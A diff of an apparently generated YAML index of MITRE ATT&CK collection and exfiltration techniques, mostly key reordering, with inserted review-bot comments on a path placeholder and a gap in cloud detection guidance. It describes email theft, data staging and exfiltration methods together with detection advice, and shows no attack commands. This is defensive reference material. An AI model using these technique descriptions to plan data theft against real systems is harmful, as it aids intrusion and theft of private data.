+ Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
+
+ Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\\Documents\Outlook Files` or `C:\Users\\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)
+ name: Local Email Collection
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1114.001
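Review bot: The Outlook storage paths in the re-added description read `C:\Users\\Documents\Outlook Files` and `C:\Users\\AppData\Local\Microsoft\Outlook`; the doubled backslash looks like a stripped `<username>` placeholder from the upstream ATT&CK text, and these are exactly the paths a file-monitoring rule for .ost/.pst collection would be built from, so the defect is worth fixing rather than carrying forward. Since the rest of this diff is key reordering, this file appears to be regenerated from the STIX bundle, so the fix belongs in the generator's handling of angle-bracket text (or upstream) rather than a hand edit here. Suggested wording: `C:\Users\<username>\Documents\Outlook Files` or `C:\Users\<username>\AppData\Local\Microsoft\Outlook`. The T1114.001 technique entry continues past the end of this hunk.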
@@ -47776,21 +49272,6 @@ collection:
url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
.ost). Retrieved February 19, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Local Email Collection
- description: |-
- Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
-
- Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\\Documents\Outlook Files` or `C:\Users\\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)
- id: attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T17:59:20.983Z'
- created: '2020-02-19T18:46:06.098Z'
x_mitre_platforms:
- Windows
x_mitre_data_sources:
@@ -47882,27 +49363,28 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2019-07-18T15:36:27.346Z'
+ modified: '2020-07-14T19:39:44.590Z'
created: '2018-01-16T16:13:52.465Z'
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Justin Warner, ICEBRG
+ x_mitre_data_sources:
+ - Authentication logs
+ - Packet capture
+ - Process monitoring
+ - API monitoring
x_mitre_detection: This is a difficult technique to detect because adversary
traffic would be masked by normal user traffic. No new processes are created
and no additional software touches disk. Authentication logs can be used to
audit logins to specific web applications, but determining malicious logins
versus benign logins may be difficult if activity matches typical user behavior.
Monitor for process injection against browser applications
- x_mitre_data_sources:
- - Authentication logs
- - Packet capture
- - Process monitoring
- - API monitoring
- x_mitre_contributors:
- - Justin Warner, ICEBRG
- x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1557:
technique:
@@ -47934,23 +49416,23 @@ collection:
phase_name: collection
modified: '2020-03-31T13:54:08.535Z'
created: '2020-02-11T19:07:12.114Z'
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
+ x_mitre_contributors:
+ - Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project
+ x_mitre_detection: Monitor network traffic for anomalies associated with known
+ MiTM behavior. Consider monitoring for modifications to system configuration
+ files involved in shaping network traffic flow.
x_mitre_data_sources:
- File monitoring
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: Monitor network traffic for anomalies associated with known
- MiTM behavior. Consider monitoring for modifications to system configuration
- files involved in shaping network traffic flow.
- x_mitre_contributors:
- - Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project
+ x_mitre_permissions_required:
+ - User
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
atomic_tests: []
T1074.002:
technique:
@@ -47958,6 +49440,10 @@ collection:
- source_name: mitre-attack
external_id: T1074.002
url: https://attack.mitre.org/techniques/T1074/002
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
+ April 24, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -47965,14 +49451,28 @@ collection:
description: |-
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
+ In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
+
By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.
id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2020-03-24T17:21:15.741Z'
+ modified: '2020-06-24T18:59:15.833Z'
created: '2020-03-13T21:14:58.206Z'
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
+
+ Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
x_mitre_platforms:
- Linux
- macOS
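Review bot: The newly added cloud-staging paragraph (`In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration...`) is not matched by any detection guidance: `x_mitre_detection` in this hunk still describes only host-side process and file monitoring, and `x_mitre_data_sources` remains `Process command-line parameters`, `Process monitoring`, `File monitoring`, while the platforms list (continuing past this hunk) still includes AWS, GCP and Azure. A practitioner using this index to assess detection coverage would be misled into thinking host telemetry covers instance-level staging, when staging inside a freshly created instance would instead surface in the provider's control-plane/audit logging of instance creation and subsequent activity. If this file is regenerated from the upstream ATT&CK STIX bundle, the gap should be raised upstream against T1074.002 rather than patched here; otherwise a sentence along the lines of `In cloud environments, monitor cloud audit logs for instance creation followed by unusual data movement into that instance.` appended to `x_mitre_detection` would close it.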
@@ -47980,40 +49480,30 @@ collection:
- AWS
- GCP
- Azure
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_detection: |-
- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
-
- Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1114.002:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1114.002
- url: https://attack.mitre.org/techniques/T1114/002
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Remote Email Collection
+ created: '2020-02-19T18:52:24.547Z'
+ modified: '2020-02-19T20:53:50.908Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a
description: Adversaries may target an Exchange server or Office 365 to collect
sensitive information. Adversaries may leverage a user's credentials and interact
directly with the Exchange server to acquire information from within a network.
Adversaries may also access externally facing Exchange services or Office
365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413)
can be used to automate searches for specific keywords.
- id: attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-02-19T20:53:50.908Z'
- created: '2020-02-19T18:52:24.547Z'
+ name: Remote Email Collection
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1114.002
+ url: https://attack.mitre.org/techniques/T1114/002
x_mitre_platforms:
- Office 365
- Windows
@@ -48065,10 +49555,12 @@ collection:
phase_name: collection
modified: '2020-03-24T19:56:37.627Z'
created: '2017-05-31T21:31:25.060Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - File monitoring
x_mitre_detection: Monitoring for screen capture behavior will depend on the
method used to obtain data from the operating system and write output files.
Detection methods could include collecting information from unusual processes
@@ -48076,12 +49568,10 @@ collection:
written to disk. The sensor data may need to be correlated with other events
to identify malicious activity, depending on the legitimacy of this behavior
within a given network environment.
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - File monitoring
- x_mitre_version: '1.1'
- x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1113
atomic_tests:
- name: Screencapture
@@ -48197,17 +49687,6 @@ collection:
phase_name: collection
modified: '2020-03-24T16:41:00.821Z'
created: '2020-02-14T13:35:32.938Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Office 365 audit logs
- - Authentication logs
- - Application logs
x_mitre_detection: "The user access logging within Microsoft's SharePoint can
be configured to report access to certain pages and documents. (Citation:
Microsoft SharePoint Logging). As information repositories generally have
@@ -48221,6 +49700,17 @@ collection:
programmatic means being used to retrieve all data within the repository.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - Authentication logs
+ - Application logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1125:
technique:
@@ -48249,27 +49739,36 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2019-07-17T21:14:04.412Z'
+ modified: '2020-07-14T19:40:47.644Z'
created: '2017-05-31T21:31:37.917Z'
- x_mitre_platforms:
- - Windows
- - macOS
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
-
- Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Praetorian
x_mitre_data_sources:
- Process monitoring
- File monitoring
- API monitoring
- x_mitre_contributors:
- - Praetorian
- x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
+
+ Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ - macOS
atomic_tests: []
T1056.003:
technique:
+ created: '2020-02-11T18:59:50.058Z'
+ modified: '2020-03-24T21:16:16.580Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -48290,27 +49789,19 @@ collection:
description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco
Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.'
source_name: Volexity Virtual Private Keylogging
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-24T21:16:16.580Z'
- created: '2020-02-11T18:59:50.058Z'
- x_mitre_system_requirements:
- - An externally facing login portal is configured.
- x_mitre_data_sources:
- - File monitoring
- x_mitre_detection: File monitoring may be used to detect changes to files in
- the Web directory for organization login pages that do not match with authorized
- updates to the Web server's content.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_detection: File monitoring may be used to detect changes to files in
+ the Web directory for organization login pages that do not match with authorized
+ updates to the Web server's content.
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_system_requirements:
+ - An externally facing login portal is configured.
atomic_tests: []
exfiltration:
T1020:
@@ -48336,20 +49827,20 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-11T13:58:08.219Z'
created: '2017-05-31T21:30:29.458Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process use of network
- x_mitre_detection: Monitor process file access patterns and network behavior.
- Unrecognized processes or scripts that appear to be traversing file systems
- and sending network traffic may be suspicious.
- x_mitre_network_requirements: true
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
+ x_mitre_network_requirements: true
+ x_mitre_detection: Monitor process file access patterns and network behavior.
+ Unrecognized processes or scripts that appear to be traversing file systems
+ and sending network traffic may be suspicious.
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process use of network
+ x_mitre_version: '1.1'
identifier: T1020
atomic_tests:
- name: IcedID Botnet HTTP PUT
@@ -48402,14 +49893,14 @@ exfiltration:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: exfiltration
- modified: '2019-06-24T12:03:02.387Z'
+ modified: '2020-07-14T19:47:46.912Z'
created: '2017-05-31T21:30:34.523Z'
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Packet capture
- - Netflow/Enclave netflow
- - Process use of network
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). If a process
maintains a long connection during which it consistently sends fixed size
@@ -48419,11 +49910,12 @@ exfiltration:
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2)'
- x_mitre_network_requirements: true
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ - Process use of network
+ - Process monitoring
+ x_mitre_version: '1.0'
identifier: T1030
atomic_tests:
- name: Data Transfer Size Limits
@@ -48495,27 +49987,27 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:50:31.548Z'
created: '2017-05-31T21:30:44.720Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Alfredo Abarca
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_network_requirements: true
- x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
- sending significantly more data than it receives from a server). Processes
- utilizing the network that do not normally have network communication or have
- never been seen before are suspicious. Analyze packet contents to detect communications
- that do not follow the expected protocol behavior for the port that is being
- used. (Citation: University of Birmingham C2)'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- Process monitoring
- Process use of network
- Packet capture
- Netflow/Enclave netflow
- Network protocol analysis
- x_mitre_version: '1.2'
+ x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
+ sending significantly more data than it receives from a server). Processes
+ utilizing the network that do not normally have network communication or have
+ never been seen before are suspicious. Analyze packet contents to detect communications
+ that do not follow the expected protocol behavior for the port that is being
+ used. (Citation: University of Birmingham C2)'
+ x_mitre_network_requirements: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_contributors:
+ - Alfredo Abarca
+ x_mitre_is_subtechnique: false
identifier: T1048
atomic_tests:
- name: Exfiltration Over Alternative Protocol - SSH
@@ -48603,23 +50095,23 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:45:51.014Z'
created: '2020-03-15T15:34:30.767Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Packet capture
- - Process use of network
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_network_requirements: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious.(Citation: University of Birmingham
C2) '
- x_mitre_network_requirements: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ - Packet capture
+ - Process use of network
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1011.001:
technique:
@@ -48642,24 +50134,34 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:34:55.439Z'
created: '2020-03-09T17:07:57.392Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - User interface
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.
Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - User interface
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1041:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:30:41.804Z'
+ modified: '2020-03-12T15:59:47.470Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: exfiltration
+ type: attack-pattern
+ id: attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Exfiltration Over C2 Channel
+ description: Adversaries may steal data by exfiltrating it over an existing
+ command and control channel. Stolen data is encoded into the normal communications
+ channel using the same protocol as command and control communications.
external_references:
- source_name: mitre-attack
external_id: T1041
@@ -48668,18 +50170,8 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- description: Adversaries may steal data by exfiltrating it over an existing
- command and control channel. Stolen data is encoded into the normal communications
- channel using the same protocol as command and control communications.
- name: Exfiltration Over C2 Channel
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: exfiltration
- modified: '2020-03-12T15:59:47.470Z'
- created: '2017-05-31T21:30:41.804Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_platforms:
- Linux
- macOS
@@ -48720,22 +50212,22 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:35:24.570Z'
created: '2017-05-31T21:30:25.159Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - User interface
- - Process monitoring
- x_mitre_contributors:
- - Itzik Kotler, SafeBreach
- x_mitre_detection: |-
- Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.
-
- Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.
- x_mitre_network_requirements: true
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
+ x_mitre_network_requirements: true
+ x_mitre_detection: |-
+ Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.
+
+ Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.
+ x_mitre_contributors:
+ - Itzik Kotler, SafeBreach
+ x_mitre_data_sources:
+ - User interface
+ - Process monitoring
+ x_mitre_version: '1.1'
atomic_tests: []
T1052:
technique:
@@ -48761,21 +50253,21 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:31:48.713Z'
created: '2017-05-31T21:30:46.461Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - Process monitoring
- - Data loss prevention
- - File monitoring
- x_mitre_detection: Monitor file access on removable media. Detect processes
- that execute when removable media are mounted.
- x_mitre_network_requirements: false
+ x_mitre_is_subtechnique: false
+ x_mitre_system_requirements:
+ - Presence of physical medium or device
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_system_requirements:
- - Presence of physical medium or device
- x_mitre_is_subtechnique: false
+ x_mitre_network_requirements: false
+ x_mitre_detection: Monitor file access on removable media. Detect processes
+ that execute when removable media are mounted.
+ x_mitre_data_sources:
+ - Process monitoring
+ - Data loss prevention
+ - File monitoring
+ x_mitre_version: '1.1'
atomic_tests: []
T1048.001:
technique:
@@ -48811,16 +50303,9 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:43:24.228Z'
created: '2020-03-15T15:30:42.378Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Malware reverse engineering
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Packet capture
- - Process use of network
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_network_requirements: true
x_mitre_detection: "Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
@@ -48829,9 +50314,16 @@ exfiltration:
by analyzing network traffic or looking for hard-coded values within malware.
If recovered, these keys can be used to decrypt network data from command
and control channels. "
- x_mitre_network_requirements: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Malware reverse engineering
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ - Packet capture
+ - Process use of network
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1048.003:
technique:
@@ -48862,24 +50354,24 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:50:31.361Z'
created: '2020-03-15T15:37:47.583Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Packet capture
- - Process use of network
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_network_requirements: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2) '
- x_mitre_network_requirements: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ - Packet capture
+ - Process use of network
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1048.003
atomic_tests:
- name: Exfiltration Over Alternative Protocol - HTTP
@@ -48969,10 +50461,14 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T01:02:24.276Z'
created: '2020-03-09T12:51:45.570Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_network_requirements: true
+ x_mitre_detection: Analyze network data for uncommon data flows (e.g., a client
+ sending significantly more data than it receives from a server). Processes
+ utilizing the network that do not normally have network communication or have
+ never been seen before are suspicious. User behavior monitoring may help to
+ detect abnormal patterns of activity.
x_mitre_data_sources:
- Process monitoring
- Process use of network
@@ -48980,14 +50476,10 @@ exfiltration:
- Netflow/Enclave netflow
- Network protocol analysis
- SSL/TLS inspection
- x_mitre_detection: Analyze network data for uncommon data flows (e.g., a client
- sending significantly more data than it receives from a server). Processes
- utilizing the network that do not normally have network communication or have
- never been seen before are suspicious. User behavior monitoring may help to
- detect abnormal patterns of activity.
- x_mitre_network_requirements: true
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1052.001:
technique:
@@ -49011,31 +50503,30 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:31:02.204Z'
created: '2020-03-11T13:50:11.467Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Presence of physical medium or device
+ x_mitre_detection: Monitor file access on removable media. Detect processes
+ that execute when removable media are mounted.
x_mitre_data_sources:
- Process monitoring
- Data loss prevention
- File monitoring
- x_mitre_detection: Monitor file access on removable media. Detect processes
- that execute when removable media are mounted.
- x_mitre_system_requirements:
- - Presence of physical medium or device
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1567.002:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1567.002
- url: https://attack.mitre.org/techniques/T1567/002
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exfiltration to Cloud Storage
+ created: '2020-03-09T15:04:32.767Z'
+ modified: '2020-03-28T01:02:24.172Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: exfiltration
+ type: attack-pattern
+ id: attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b
description: "Adversaries may exfiltrate data to a cloud storage service rather
than over their primary command and control channel. Cloud storage services
allow for the storage, edit, and retrieval of data from a remote cloud storage
@@ -49043,13 +50534,14 @@ exfiltration:
and Google Docs. Exfiltration to these cloud storage services can provide
a significant amount of cover to the adversary if hosts within the network
are already communicating with the service. "
- id: attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: exfiltration
- modified: '2020-03-28T01:02:24.172Z'
- created: '2020-03-09T15:04:32.767Z'
+ name: Exfiltration to Cloud Storage
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1567.002
+ url: https://attack.mitre.org/techniques/T1567/002
x_mitre_platforms:
- Linux
- macOS
